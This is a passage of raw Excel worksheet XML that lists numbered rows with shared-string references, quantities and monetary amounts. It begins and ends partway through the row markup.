      <c r="C39" s="237" t="s">
        <v>317</v>
      </c>
      <c r="D39" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E39" s="237" t="s">
        <v>318</v>
      </c>
      <c r="F39" s="88"/>
      <c r="G39" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H39" s="11">
        <v>1</v>
      </c>
      <c r="I39" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J39" s="100">
        <v>11500</v>
      </c>
      <c r="K39" s="99">
        <v>2024</v>
      </c>
      <c r="L39" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M39" s="225"/>
    </row>
    <row r="40" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B40" s="88">
        <v>33</v>
      </c>
      <c r="C40" s="237" t="s">
        <v>319</v>
      </c>
      <c r="D40" s="238" t="s">
        <v>320</v>
      </c>
      <c r="E40" s="237" t="s">
        <v>321</v>
      </c>
      <c r="F40" s="88"/>
      <c r="G40" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H40" s="11">
        <v>1</v>
      </c>
      <c r="I40" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J40" s="100">
        <v>45000</v>
      </c>
      <c r="K40" s="99">
        <v>8280</v>
      </c>
      <c r="L40" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M40" s="225"/>
    </row>
    <row r="41" ht="14.25" customHeight="1" spans="2:13">
      <c r="B41" s="88">
        <v>34</v>
      </c>
      <c r="C41" s="237" t="s">
        <v>323</v>
      </c>
      <c r="D41" s="238" t="s">
        <v>324</v>
      </c>
      <c r="E41" s="238" t="s">
        <v>325</v>
      </c>
      <c r="F41" s="14"/>
      <c r="G41" s="11"/>
      <c r="H41" s="11">
        <v>2</v>
      </c>
      <c r="I41" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J41" s="91">
        <v>12000</v>
      </c>
      <c r="K41" s="99">
        <v>4416</v>
      </c>
      <c r="L41" s="238" t="s">
        <v>230</v>
      </c>
      <c r="M41" s="225"/>
    </row>
    <row r="42" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B42" s="88">
        <v>35</v>
      </c>
      <c r="C42" s="237" t="s">
        <v>327</v>
      </c>
      <c r="D42" s="238" t="s">
        <v>328</v>
      </c>
      <c r="E42" s="237" t="s">
        <v>329</v>
      </c>
      <c r="F42" s="88"/>
      <c r="G42" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H42" s="11">
        <v>1</v>
      </c>
      <c r="I42" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J42" s="100">
        <v>108000</v>
      </c>
      <c r="K42" s="99">
        <v>19872</v>
      </c>
      <c r="L42" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M42" s="225"/>
    </row>
    <row r="43" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B43" s="88">
        <v>36</v>
      </c>
      <c r="C43" s="237" t="s">
        <v>330</v>
      </c>
      <c r="D43" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E43" s="237" t="s">
        <v>332</v>
      </c>
      <c r="F43" s="88"/>
      <c r="G43" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H43" s="11">
        <v>1</v>
      </c>
      <c r="I43" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J43" s="100">
        <v>175000</v>
      </c>
      <c r="K43" s="99">
        <v>24840</v>
      </c>
      <c r="L43" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M43" s="225"/>
    </row>
    <row r="44" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B44" s="88">
        <v>37</v>
      </c>
      <c r="C44" s="237" t="s">
        <v>333</v>
      </c>
      <c r="D44" s="238" t="s">
        <v>334</v>
      </c>
      <c r="E44" s="237" t="s">
        <v>335</v>
      </c>
      <c r="F44" s="88"/>
      <c r="G44" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H44" s="11">
        <v>1</v>
      </c>
      <c r="I44" s="237" t="s">
        <v>336</v>
      </c>
      <c r="J44" s="100">
        <v>22500</v>
      </c>
      <c r="K44" s="99">
        <v>4160</v>
      </c>
      <c r="L44" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M44" s="225"/>
    </row>
    <row r="45" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B45" s="88">
        <v>38</v>
      </c>
      <c r="C45" s="237" t="s">
        <v>337</v>
      </c>
      <c r="D45" s="238" t="s">
        <v>338</v>
      </c>
      <c r="E45" s="237" t="s">
        <v>282</v>
      </c>
      <c r="F45" s="88"/>
      <c r="G45" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H45" s="11">
        <v>1</v>
      </c>
      <c r="I45" s="237" t="s">
        <v>339</v>
      </c>
      <c r="J45" s="100">
        <v>85000</v>
      </c>
      <c r="K45" s="99">
        <v>16640</v>
      </c>
      <c r="L45" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M45" s="225"/>
    </row>
    <row r="46" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B46" s="88">
        <v>39</v>
      </c>
      <c r="C46" s="237" t="s">
        <v>340</v>
      </c>
      <c r="D46" s="238" t="s">
        <v>341</v>
      </c>
      <c r="E46" s="237" t="s">
        <v>342</v>
      </c>
      <c r="F46" s="88"/>
      <c r="G46" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H46" s="11">
        <v>1</v>
      </c>
      <c r="I46" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J46" s="100">
        <v>123000</v>
      </c>
      <c r="K46" s="99">
        <v>25760</v>
      </c>
      <c r="L46" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M46" s="225"/>
    </row>
    <row r="47" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B47" s="88">
        <v>40</v>
      </c>
      <c r="C47" s="237" t="s">
        <v>344</v>
      </c>
      <c r="D47" s="238" t="s">
        <v>345</v>
      </c>
      <c r="E47" s="237" t="s">
        <v>346</v>
      </c>
      <c r="F47" s="88"/>
      <c r="G47" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H47" s="11">
        <v>1</v>
      </c>
      <c r="I47" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J47" s="100">
        <v>248000</v>
      </c>
      <c r="K47" s="99">
        <v>26400</v>
      </c>
      <c r="L47" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M47" s="225"/>
    </row>
    <row r="48" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B48" s="88">
        <v>41</v>
      </c>
      <c r="C48" s="237" t="s">
        <v>348</v>
      </c>
      <c r="D48" s="238" t="s">
        <v>349</v>
      </c>
      <c r="E48" s="237" t="s">
        <v>350</v>
      </c>
      <c r="F48" s="88"/>
      <c r="G48" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H48" s="11">
        <v>1</v>
      </c>
      <c r="I48" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J48" s="100">
        <v>91500</v>
      </c>
      <c r="K48" s="99">
        <v>10200</v>
      </c>
      <c r="L48" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M48" s="225"/>
    </row>
    <row r="49" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B49" s="88">
        <v>42</v>
      </c>
      <c r="C49" s="237" t="s">
        <v>351</v>
      </c>
      <c r="D49" s="238" t="s">
        <v>352</v>
      </c>
      <c r="E49" s="237" t="s">
        <v>353</v>
      </c>
      <c r="F49" s="88"/>
      <c r="G49" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H49" s="11">
        <v>1</v>
      </c>
      <c r="I49" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J49" s="100">
        <v>202000</v>
      </c>
      <c r="K49" s="99">
        <v>21600</v>
      </c>
      <c r="L49" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M49" s="225"/>
    </row>
    <row r="50" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B50" s="88">
        <v>43</v>
      </c>
      <c r="C50" s="237" t="s">
        <v>354</v>
      </c>
      <c r="D50" s="238" t="s">
        <v>355</v>
      </c>
      <c r="E50" s="237" t="s">
        <v>356</v>
      </c>
      <c r="F50" s="88"/>
      <c r="G50" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H50" s="11">
        <v>1</v>
      </c>
      <c r="I50" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J50" s="100">
        <v>280000</v>
      </c>
      <c r="K50" s="99">
        <v>31200</v>
      </c>
      <c r="L50" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M50" s="225"/>
    </row>
    <row r="51" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B51" s="88">
        <v>44</v>
      </c>
      <c r="C51" s="237" t="s">
        <v>357</v>
      </c>
      <c r="D51" s="238" t="s">
        <v>358</v>
      </c>
      <c r="E51" s="237" t="s">
        <v>359</v>
      </c>
      <c r="F51" s="88"/>
      <c r="G51" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H51" s="11">
        <v>1</v>
      </c>
      <c r="I51" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J51" s="100">
        <v>310000</v>
      </c>
      <c r="K51" s="99">
        <v>27600</v>
      </c>
      <c r="L51" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M51" s="225"/>
    </row>
    <row r="52" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B52" s="88">
        <v>45</v>
      </c>
      <c r="C52" s="237" t="s">
        <v>360</v>
      </c>
      <c r="D52" s="238" t="s">
        <v>361</v>
      </c>
      <c r="E52" s="237" t="s">
        <v>362</v>
      </c>
      <c r="F52" s="88"/>
      <c r="G52" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H52" s="11">
        <v>1</v>
      </c>
      <c r="I52" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J52" s="100">
        <v>98000</v>
      </c>
      <c r="K52" s="99">
        <v>11760</v>
      </c>
      <c r="L52" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M52" s="225"/>
    </row>
    <row r="53" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B53" s="88">
        <v>46</v>
      </c>
      <c r="C53" s="237" t="s">
        <v>363</v>
      </c>
      <c r="D53" s="238" t="s">
        <v>364</v>
      </c>
      <c r="E53" s="237" t="s">
        <v>365</v>
      </c>
      <c r="F53" s="88"/>
      <c r="G53" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H53" s="11">
        <v>1</v>
      </c>
      <c r="I53" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J53" s="100">
        <v>16100</v>
      </c>
      <c r="K53" s="99">
        <v>1440</v>
      </c>
      <c r="L53" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M53" s="225"/>
    </row>
    <row r="54" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B54" s="88">
        <v>47</v>
      </c>
      <c r="C54" s="237" t="s">
        <v>366</v>
      </c>
      <c r="D54" s="238" t="s">
        <v>367</v>
      </c>
      <c r="E54" s="237" t="s">
        <v>368</v>
      </c>
      <c r="F54" s="88"/>
      <c r="G54" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H54" s="11">
        <v>2</v>
      </c>
      <c r="I54" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J54" s="100">
        <v>519000</v>
      </c>
      <c r="K54" s="99">
        <v>26400</v>
      </c>
      <c r="L54" s="239" t="s">
        <v>347</v>
      </c>
      <c r="M54" s="225"/>
    </row>
    <row r="55" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B55" s="88">
        <v>48</v>
      </c>
      <c r="C55" s="237" t="s">
        <v>369</v>
      </c>
      <c r="D55" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E55" s="237" t="s">
        <v>370</v>
      </c>
      <c r="F55" s="88"/>
      <c r="G55" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H55" s="11">
        <v>2</v>
      </c>
      <c r="I55" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J55" s="100">
        <v>19000</v>
      </c>
      <c r="K55" s="99">
        <v>2944</v>
      </c>
      <c r="L55" s="239" t="s">
        <v>371</v>
      </c>
      <c r="M55" s="225"/>
    </row>
    <row r="56" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B56" s="88">
        <v>49</v>
      </c>
      <c r="C56" s="237" t="s">
        <v>372</v>
      </c>
      <c r="D56" s="238" t="s">
        <v>373</v>
      </c>
      <c r="E56" s="237" t="s">
        <v>374</v>
      </c>
      <c r="F56" s="88"/>
      <c r="G56" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H56" s="11">
        <v>1</v>
      </c>
      <c r="I56" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J56" s="100">
        <v>19000</v>
      </c>
      <c r="K56" s="99">
        <v>3600</v>
      </c>
      <c r="L56" s="239" t="s">
        <v>375</v>
      </c>
      <c r="M56" s="225"/>
    </row>
    <row r="57" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B57" s="88">
        <v>50</v>
      </c>
      <c r="C57" s="237" t="s">
        <v>376</v>
      </c>
      <c r="D57" s="238" t="s">
        <v>377</v>
      </c>
      <c r="E57" s="237" t="s">
        <v>378</v>
      </c>
      <c r="F57" s="88"/>
      <c r="G57" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H57" s="11">
        <v>1</v>
      </c>
      <c r="I57" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J57" s="100">
        <v>135000</v>
      </c>
      <c r="K57" s="99">
        <v>16200</v>
      </c>
      <c r="L57" s="239" t="s">
        <v>379</v>
      </c>
      <c r="M57" s="225"/>
    </row>
    <row r="58" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B58" s="88">
        <v>51</v>
      </c>
      <c r="C58" s="237" t="s">
        <v>380</v>
      </c>
      <c r="D58" s="238" t="s">
        <v>381</v>
      </c>
      <c r="E58" s="237" t="s">
        <v>382</v>
      </c>
      <c r="F58" s="88"/>
      <c r="G58" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H58" s="11">
        <v>1</v>
      </c>
      <c r="I58" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J58" s="100">
        <v>18400</v>
      </c>
      <c r="K58" s="99">
        <v>1440</v>
      </c>
      <c r="L58" s="239" t="s">
        <v>379</v>
      </c>
      <c r="M58" s="225"/>
    </row>
    <row r="59" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B59" s="88">
        <v>52</v>
      </c>
      <c r="C59" s="237" t="s">
        <v>383</v>
      </c>
      <c r="D59" s="238" t="s">
        <v>384</v>
      </c>
      <c r="E59" s="237" t="s">
        <v>385</v>
      </c>
      <c r="F59" s="88"/>
      <c r="G59" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H59" s="11">
        <v>1</v>
      </c>
      <c r="I59" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J59" s="100">
        <v>38000</v>
      </c>
      <c r="K59" s="99">
        <v>0</v>
      </c>
      <c r="L59" s="239" t="s">
        <v>379</v>
      </c>
      <c r="M59" s="225"/>
    </row>
    <row r="60" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B60" s="88">
        <v>53</v>
      </c>
      <c r="C60" s="237" t="s">
        <v>386</v>
      </c>
      <c r="D60" s="238" t="s">
        <v>387</v>
      </c>
      <c r="E60" s="237" t="s">
        <v>388</v>
      </c>
      <c r="F60" s="88"/>
      <c r="G60" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H60" s="11">
        <v>1</v>
      </c>
      <c r="I60" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J60" s="100">
        <v>39100</v>
      </c>
      <c r="K60" s="99">
        <v>0</v>
      </c>
      <c r="L60" s="239" t="s">
        <v>379</v>
      </c>
      <c r="M60" s="225"/>
    </row>
    <row r="61" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B61" s="88">
        <v>54</v>
      </c>
      <c r="C61" s="237" t="s">
        <v>389</v>
      </c>
      <c r="D61" s="238" t="s">
        <v>390</v>
      </c>
      <c r="E61" s="237" t="s">
        <v>391</v>
      </c>
      <c r="F61" s="88"/>
      <c r="G61" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H61" s="11">
        <v>1</v>
      </c>
      <c r="I61" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J61" s="100">
        <v>105000</v>
      </c>
      <c r="K61" s="99">
        <v>1260</v>
      </c>
      <c r="L61" s="239" t="s">
        <v>379</v>
      </c>
      <c r="M61" s="225"/>
    </row>
    <row r="62" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B62" s="88">
        <v>55</v>
      </c>
      <c r="C62" s="237" t="s">
        <v>392</v>
      </c>
      <c r="D62" s="238" t="s">
        <v>393</v>
      </c>
      <c r="E62" s="237" t="s">
        <v>394</v>
      </c>
      <c r="F62" s="88"/>
      <c r="G62" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H62" s="11">
        <v>1</v>
      </c>
      <c r="I62" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J62" s="100">
        <v>118000</v>
      </c>
      <c r="K62" s="99">
        <v>14160</v>
      </c>
      <c r="L62" s="239" t="s">
        <v>379</v>
      </c>
      <c r="M62" s="225"/>
    </row>
    <row r="63" ht="14.25" customHeight="1" spans="2:13">
      <c r="B63" s="88">
        <v>56</v>
      </c>
      <c r="C63" s="237" t="s">
        <v>395</v>
      </c>
      <c r="D63" s="238" t="s">
        <v>396</v>
      </c>
      <c r="E63" s="238" t="s">
        <v>397</v>
      </c>
      <c r="F63" s="14"/>
      <c r="G63" s="11"/>
      <c r="H63" s="11">
        <v>2</v>
      </c>
      <c r="I63" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J63" s="91">
        <v>138000</v>
      </c>
      <c r="K63" s="99">
        <v>0</v>
      </c>
      <c r="L63" s="238" t="s">
        <v>379</v>
      </c>
      <c r="M63" s="225"/>
    </row>
    <row r="64" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B64" s="88">
        <v>57</v>
      </c>
      <c r="C64" s="237" t="s">
        <v>398</v>
      </c>
      <c r="D64" s="238" t="s">
        <v>399</v>
      </c>
      <c r="E64" s="237" t="s">
        <v>400</v>
      </c>
      <c r="F64" s="88"/>
      <c r="G64" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H64" s="11">
        <v>1</v>
      </c>
      <c r="I64" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J64" s="100">
        <v>110000</v>
      </c>
      <c r="K64" s="99">
        <v>47400</v>
      </c>
      <c r="L64" s="239" t="s">
        <v>401</v>
      </c>
      <c r="M64" s="225"/>
    </row>
    <row r="65" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B65" s="88">
        <v>58</v>
      </c>
      <c r="C65" s="237" t="s">
        <v>402</v>
      </c>
      <c r="D65" s="238" t="s">
        <v>403</v>
      </c>
      <c r="E65" s="237" t="s">
        <v>404</v>
      </c>
      <c r="F65" s="88"/>
      <c r="G65" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="11">
        <v>1</v>
      </c>
      <c r="I65" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J65" s="100">
        <v>8100</v>
      </c>
      <c r="K65" s="99">
        <v>972</v>
      </c>
      <c r="L65" s="239" t="s">
        <v>405</v>
      </c>
      <c r="M65" s="225"/>
    </row>
    <row r="66" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B66" s="88">
        <v>59</v>
      </c>
      <c r="C66" s="237" t="s">
        <v>406</v>
      </c>
      <c r="D66" s="238" t="s">
        <v>407</v>
      </c>
      <c r="E66" s="237" t="s">
        <v>408</v>
      </c>
      <c r="F66" s="88"/>
      <c r="G66" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H66" s="11">
        <v>1</v>
      </c>
      <c r="I66" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J66" s="100">
        <v>13510</v>
      </c>
      <c r="K66" s="99">
        <v>960</v>
      </c>
      <c r="L66" s="239" t="s">
        <v>405</v>
      </c>
      <c r="M66" s="225"/>
    </row>
    <row r="67" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B67" s="88">
        <v>60</v>
      </c>
      <c r="C67" s="237" t="s">
        <v>409</v>
      </c>
      <c r="D67" s="238" t="s">
        <v>410</v>
      </c>
      <c r="E67" s="237" t="s">
        <v>411</v>
      </c>
      <c r="F67" s="88"/>
      <c r="G67" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H67" s="11">
        <v>2</v>
      </c>
      <c r="I67" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J67" s="100">
        <v>1015000</v>
      </c>
      <c r="K67" s="99">
        <v>117600</v>
      </c>
      <c r="L67" s="239" t="s">
        <v>405</v>
      </c>
      <c r="M67" s="225"/>
    </row>
    <row r="68" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B68" s="88">
        <v>61</v>
      </c>
      <c r="C68" s="237" t="s">
        <v>412</v>
      </c>
      <c r="D68" s="238" t="s">
        <v>328</v>
      </c>
      <c r="E68" s="237" t="s">
        <v>413</v>
      </c>
      <c r="F68" s="88"/>
      <c r="G68" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H68" s="11">
        <v>2</v>
      </c>
      <c r="I68" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J68" s="100">
        <v>141000</v>
      </c>
      <c r="K68" s="99">
        <v>9600</v>
      </c>
      <c r="L68" s="239" t="s">
        <v>405</v>
      </c>
      <c r="M68" s="225"/>
    </row>
    <row r="69" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B69" s="88">
        <v>62</v>
      </c>
      <c r="C69" s="237" t="s">
        <v>414</v>
      </c>
      <c r="D69" s="238" t="s">
        <v>415</v>
      </c>
      <c r="E69" s="237" t="s">
        <v>416</v>
      </c>
      <c r="F69" s="88"/>
      <c r="G69" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H69" s="11">
        <v>2</v>
      </c>
      <c r="I69" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J69" s="100">
        <v>5100</v>
      </c>
      <c r="K69" s="99">
        <v>1440</v>
      </c>
      <c r="L69" s="239" t="s">
        <v>417</v>
      </c>
      <c r="M69" s="225"/>
    </row>
    <row r="70" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B70" s="88">
        <v>63</v>
      </c>
      <c r="C70" s="237" t="s">
        <v>418</v>
      </c>
      <c r="D70" s="238" t="s">
        <v>419</v>
      </c>
      <c r="E70" s="237" t="s">
        <v>420</v>
      </c>
      <c r="F70" s="88"/>
      <c r="G70" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H70" s="11">
        <v>1</v>
      </c>
      <c r="I70" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J70" s="100">
        <v>200000</v>
      </c>
      <c r="K70" s="99">
        <v>21600</v>
      </c>
      <c r="L70" s="239" t="s">
        <v>417</v>
      </c>
      <c r="M70" s="225"/>
    </row>
    <row r="71" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B71" s="88">
        <v>64</v>
      </c>
      <c r="C71" s="237" t="s">
        <v>421</v>
      </c>
      <c r="D71" s="238" t="s">
        <v>422</v>
      </c>
      <c r="E71" s="237" t="s">
        <v>245</v>
      </c>
      <c r="F71" s="88"/>
      <c r="G71" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H71" s="11">
        <v>1</v>
      </c>
      <c r="I71" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J71" s="100">
        <v>58000</v>
      </c>
      <c r="K71" s="99">
        <v>6960</v>
      </c>
      <c r="L71" s="239" t="s">
        <v>423</v>
      </c>
      <c r="M71" s="225"/>
    </row>
    <row r="72" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B72" s="88">
        <v>65</v>
      </c>
      <c r="C72" s="237" t="s">
        <v>424</v>
      </c>
      <c r="D72" s="238" t="s">
        <v>425</v>
      </c>
      <c r="E72" s="237" t="s">
        <v>411</v>
      </c>
      <c r="F72" s="88"/>
      <c r="G72" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H72" s="11">
        <v>1</v>
      </c>
      <c r="I72" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J72" s="100">
        <v>560000</v>
      </c>
      <c r="K72" s="99">
        <v>90160</v>
      </c>
      <c r="L72" s="239" t="s">
        <v>423</v>
      </c>
      <c r="M72" s="225"/>
    </row>
    <row r="73" ht="14.25" customHeight="1" spans="2:13">
      <c r="B73" s="88">
        <v>66</v>
      </c>
      <c r="C73" s="237" t="s">
        <v>426</v>
      </c>
      <c r="D73" s="238" t="s">
        <v>427</v>
      </c>
      <c r="E73" s="238" t="s">
        <v>428</v>
      </c>
      <c r="F73" s="9" t="s">
        <v>429</v>
      </c>
      <c r="G73" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H73" s="11">
        <v>1</v>
      </c>
      <c r="I73" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J73" s="91">
        <v>470000</v>
      </c>
      <c r="K73" s="99">
        <v>248400</v>
      </c>
      <c r="L73" s="238" t="s">
        <v>423</v>
      </c>
      <c r="M73" s="225"/>
    </row>
    <row r="74" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B74" s="88">
        <v>67</v>
      </c>
      <c r="C74" s="237" t="s">
        <v>430</v>
      </c>
      <c r="D74" s="238" t="s">
        <v>431</v>
      </c>
      <c r="E74" s="237" t="s">
        <v>388</v>
      </c>
      <c r="F74" s="88"/>
      <c r="G74" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H74" s="11">
        <v>1</v>
      </c>
      <c r="I74" s="237" t="s">
        <v>432</v>
      </c>
      <c r="J74" s="100">
        <v>162393.16</v>
      </c>
      <c r="K74" s="99">
        <v>34560</v>
      </c>
      <c r="L74" s="239" t="s">
        <v>433</v>
      </c>
      <c r="M74" s="225"/>
    </row>
    <row r="75" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B75" s="88">
        <v>68</v>
      </c>
      <c r="C75" s="237" t="s">
        <v>434</v>
      </c>
      <c r="D75" s="238" t="s">
        <v>435</v>
      </c>
      <c r="E75" s="237" t="s">
        <v>436</v>
      </c>
      <c r="F75" s="88"/>
      <c r="G75" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H75" s="11">
        <v>1</v>
      </c>
      <c r="I75" s="237" t="s">
        <v>437</v>
      </c>
      <c r="J75" s="100">
        <v>75000</v>
      </c>
      <c r="K75" s="99">
        <v>23625</v>
      </c>
      <c r="L75" s="239" t="s">
        <v>438</v>
      </c>
      <c r="M75" s="225"/>
    </row>
    <row r="76" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B76" s="88">
        <v>69</v>
      </c>
      <c r="C76" s="237" t="s">
        <v>439</v>
      </c>
      <c r="D76" s="238" t="s">
        <v>435</v>
      </c>
      <c r="E76" s="237" t="s">
        <v>440</v>
      </c>
      <c r="F76" s="88"/>
      <c r="G76" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H76" s="11">
        <v>1</v>
      </c>
      <c r="I76" s="237" t="s">
        <v>437</v>
      </c>
      <c r="J76" s="100">
        <v>79500</v>
      </c>
      <c r="K76" s="99">
        <v>23625</v>
      </c>
      <c r="L76" s="239" t="s">
        <v>438</v>
      </c>
      <c r="M76" s="225"/>
    </row>
    <row r="77" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B77" s="88">
        <v>70</v>
      </c>
      <c r="C77" s="237" t="s">
        <v>441</v>
      </c>
      <c r="D77" s="238" t="s">
        <v>442</v>
      </c>
      <c r="E77" s="237" t="s">
        <v>443</v>
      </c>
      <c r="F77" s="88"/>
      <c r="G77" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H77" s="11">
        <v>1</v>
      </c>
      <c r="I77" s="237" t="s">
        <v>437</v>
      </c>
      <c r="J77" s="100">
        <v>130000</v>
      </c>
      <c r="K77" s="99">
        <v>23625</v>
      </c>
      <c r="L77" s="239" t="s">
        <v>438</v>
      </c>
      <c r="M77" s="225"/>
    </row>
    <row r="78" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B78" s="88">
        <v>71</v>
      </c>
      <c r="C78" s="237" t="s">
        <v>444</v>
      </c>
      <c r="D78" s="238" t="s">
        <v>445</v>
      </c>
      <c r="E78" s="237" t="s">
        <v>446</v>
      </c>
      <c r="F78" s="88"/>
      <c r="G78" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H78" s="11">
        <v>1</v>
      </c>
      <c r="I78" s="237" t="s">
        <v>447</v>
      </c>
      <c r="J78" s="100">
        <v>264957.28</v>
      </c>
      <c r="K78" s="99">
        <v>81900</v>
      </c>
      <c r="L78" s="239" t="s">
        <v>448</v>
      </c>
      <c r="M78" s="225"/>
    </row>
    <row r="79" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B79" s="88">
        <v>72</v>
      </c>
      <c r="C79" s="237" t="s">
        <v>449</v>
      </c>
      <c r="D79" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E79" s="237" t="s">
        <v>451</v>
      </c>
      <c r="F79" s="88"/>
      <c r="G79" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H79" s="11">
        <v>1</v>
      </c>
      <c r="I79" s="237" t="s">
        <v>452</v>
      </c>
